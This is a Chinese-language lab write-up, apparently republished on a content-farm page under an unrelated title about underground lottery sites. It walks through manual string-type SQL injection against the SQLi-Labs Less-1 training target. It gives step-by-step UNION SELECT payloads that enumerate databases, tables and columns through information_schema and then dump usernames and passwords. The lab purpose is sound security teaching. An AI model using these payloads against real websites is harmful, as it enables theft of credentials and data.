当前位置: 首页 > news >正文

怎么做地下彩票网站/什么是百度竞价推广

怎么做地下彩票网站,什么是百度竞价推广,中国企业500强第一名是谁,wordpress主题不分页基于SQLI的SQL字符型报错注入 一. 实验目的 理解数字型报错SQL注入漏洞点的定位方法,掌握利用手工方式完成一次完整SQL注入的过程,熟悉常见SQL注入命令的操作。 二. 实验环境 渗透主机:KALI平台 用户名: college 密码: 360College 目标网…

基于SQLI的SQL字符型报错注入

一. 实验目的

理解数字型报错SQL注入漏洞点的定位方法,掌握利用手工方式完成一次完整SQL注入的过程,熟悉常见SQL注入命令的操作。

二. 实验环境

渗透主机:KALI平台
用户名: college
密码: 360College

目标网站:SQLI平台的Less-1科目
用户名: xxx
密码: xxx

注意:将MySQL的版本调到5.5以上,因为这样数据库内才会有information_schema数据库。(实验镜像中已经调整)

三. 实验原理

MySQL语言的注释语法:

--(这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上--,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替--,原因是+在URL被URL编码后会变成空格。

四. 实验内容

1. 靶机/var/www/html中找到源码分析Less-1网页源码

请添加图片描述
请添加图片描述
得出结论:如果你输入不同的id值就会返回不同的结果,实际查询的语句是:

SELECT * FROM users WHERE id="1 LIMIT 0,1;

2. kali访问网址http://靶机IP/Less-1/进行注入

(1)在浏览器地址栏中输入http://【靶机IP】/Less-1/,访问SQLI-Labs的less-1

靶机IP
请添加图片描述

(2)在上面的URL末端加上?id=1的动态参数,页面显示登录用户名Dumb、密码Dumb:
请添加图片描述

尝试判断是否存在SQL注入以及哪种注入类型

(1)经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询。

请添加图片描述

(2)尝试在id后面加上(单引号),发现页面回显不正常,表示可能存在SQL字符注入。
请添加图片描述

(3)输入- -+将sql后面的语句注释掉后,页面回显正常,则证明是单引号字符型注入。
请添加图片描述

手工SQL注入获得数据库的用户名与密码

说明:本实验Kali平台的Firefox浏览器中已预安装Hackbar插件,可使用快捷键F12启用。后续的实验步骤中,可以选择在Hackbar中来执行,或者直接在浏览器的地址栏中执行。

(1)使用order by语句判断该表中一共有几列数据。order by 3页面回显正常,order by 4页面回显不正常,说明此表一共有3列。

所用的payload格式为:http://【靶机IP】/Less-1/?id=1' order by N --+

请添加图片描述

请添加图片描述

(2)使用union select 1,2,3联合查询语句查看页面是否有显示位。发现页面先输出了2和3,说明页面有2个显示位。

所用的payload格式为:http://【靶机IP】/Less-1/?id=1' and 1=2 union select 1,2,3 --+
请添加图片描述

(3)利用sql查询语句爆破出数据库内的数据库名。

所用的payload格式为:http://【靶机IP】/Less-1/?id=1' and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata --+

请添加图片描述

(4)利用sql查询语句爆破出security数据库内的表名。

所用的payload格式为:http://【靶机IP】/Less-1/?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

请添加图片描述

(5)利用sql查询语句爆破出users数据表内的列名。

所用的payload格式为:http://【靶机IP】/Less-1/?id=1’ and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

请添加图片描述

(6)利用sql查询语句爆破出username、password列的值。

所用的payload格式为:http://【靶机IP】/Less-1/?id=1' and 1=2 union select 1,group_concat(username), group_concat(password) from security.users --+

请添加图片描述

五. 思考与总结

通过本次实验,成功实现了利用SQL注入漏洞的管理员帐户密码的获取,掌握了SQL注入漏洞的手工攻击方法,在此基础上可以深刻体会SQL注入漏洞的危害以及采取相关网络安全防护防御措施。

http://www.jmfq.cn/news/4926763.html

相关文章:

  • 来个网站/国际免费b站
  • 购物网站模板代码/企业网站的推广方法有哪些
  • 关于做网站的策划书/线上销售平台有哪些
  • 南京学校网站建设策划/旺道seo软件
  • 服务器可以放几个网站/搜索引擎在线观看
  • 怎么做本地婚姻介绍网站/山西网络营销seo
  • 网页设计图片的代码/seo中文
  • 刷赞网站建设/免费推广软件下载
  • minecraft做图网站/php开源建站系统
  • 优秀高端网站建设公司/网站推广优化公司
  • 广告网站设计怎么样/100大看免费行情的软件
  • 网站备案系统验证码出错的解决方案/网站设计开发网站
  • 域名自助服务平台/小璇seo优化网站
  • 宿迁做网站 宿迁网站建设/中国互联网公司排名
  • 网络公司发生网站建设费分录/湖南关键词优化快速
  • 织梦m网站伪静态/北京网站建设公司案例
  • 中国住建网查询证书/郑州seo
  • 电商网站开发设计方案/整站seo服务
  • wordpress建站 ftp/品牌词优化
  • 湖北省最新疫情情况/优化网站页面
  • 网站开发过程记录/nba最新消息
  • 如何免费建网站/关键词排名优化顾问
  • 社区网站制作/今天最新新闻摘抄
  • 网站设计酷站/百度关键词怎么做
  • asp.net网站开发上/万网域名注册
  • 同一网站相同form id/seo主要做什么
  • 网站建设gzzhixun/国内可访问的海外网站和应用
  • 郑州做网站推广运营商/网络营销推广方式包括
  • 做网站的公司怎么找客户/友情链接软件
  • 苏州现在能正常出入吗/重庆网站优化软件